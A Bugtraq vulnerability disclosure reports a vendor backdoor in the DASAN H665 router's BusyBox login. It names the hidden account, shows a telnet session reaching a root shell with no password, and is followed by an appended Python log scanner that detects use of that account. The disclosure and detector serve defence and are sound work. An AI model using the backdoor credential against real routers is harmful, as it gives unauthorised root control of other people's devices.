DASAN H665 has vendor backdoor built into BusyBox’s /bin/login

From: Krzysztof Burghardt <krzysztof@burghardt.pl>
To: bugtraq@securityfocus.com
Subject: DASAN H665 has vendor backdoor built into BusyBox’s /bin/login

Hi!

DASAN H665 has a vendor backdoor built into BusyBox /bin/login. An account
named "dnsekakf2$$" gives access to the admin (uid 0) account over telnet
without any password, at least for the administration interface documented
in the H665 Quick Guide (subnet 192.168.55.0/24 on the LAN interface).

$ telnet 192.168.55.1
Trying 192.168.55.1...
Connected to 192.168.55.1.
Escape character is '^]'.
tc login: dnsekakf2$$
# uname -a
Linux tc 2.6.36 #1 SMP Wed Jan 3 09:32:57 UTC 2018 mips unknown
# tail -n1 /data/log/messages
Feb 15 16:59:26 login[26929]: Try to connect using hidden account

For longer version visit:
https://blog.burghardt.pl/2019/02/dasan-h665-has-vendor-backdoor-built-into-busyboxs-bin-login/

BR,
-- 
Krzysztof Burghardt <krzysztof@burghardt.pl>
http://www.burghardt.pl/
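
A log check for the message shown in the session above, as an added example that is not part of the original post or the vendor's code. It assumes logs are collected as plain syslog lines; the function names, the optional host/facility fields and every sample line except the first are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Message text copied from the /data/log/messages line in the post.
MARKER = "Try to connect using hidden account"

# Assumed syslog layout: "Mon DD HH:MM:SS [host] [facility.level] tag[pid]: msg".
# Host and facility are optional because the line in the post carries neither.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s\d{2}:\d{2}:\d{2})\s+"
    r"(?:[^\s:\[]+\s+){0,2}"
    r"(?P<tag>[^\s:\[]+)(?:\[(?P<pid>\d+)\])?:\s*(?P<msg>.*)$"
)

def find_hidden_account_logins(lines):
    """Return one record per login(1) line that reports the hidden account."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        # Require the tag to be "login" so the same text quoted by another
        # program (or injected through a different tag) is not counted.
        if m and m["tag"] == "login" and MARKER in m["msg"]:
            pid = int(m["pid"]) if m["pid"] else None
            hits.append({"ts": m["ts"], "pid": pid})
    return hits

def hits_per_day(hits):
    """Count detections per calendar day ("Feb 15"); syslog omits the year."""
    return Counter(" ".join(h["ts"].split()[:2]) for h in hits)

# Constructed sample: the first line is the one from the post, the rest are made up.
SAMPLE_LOG = """\
Feb 15 16:59:26 login[26929]: Try to connect using hidden account
Feb 15 17:01:03 login[26950]: root login on 'pts/0'
Feb 15 17:02:10 tc auth.info login[27001]: Try to connect using hidden account
Feb 15 17:05:00 httpd[300]: note: Try to connect using hidden account
Feb 16 09:12:44 kernel: eth0: link up
""".splitlines()

if __name__ == "__main__":
    found = find_hidden_account_logins(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} pid={h['pid']} hidden-account login")
    print(dict(hits_per_day(found)))
```

The device writes this line to its local /data/log/messages, so the check is only useful on logs forwarded off the device, where a root session cannot edit them.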




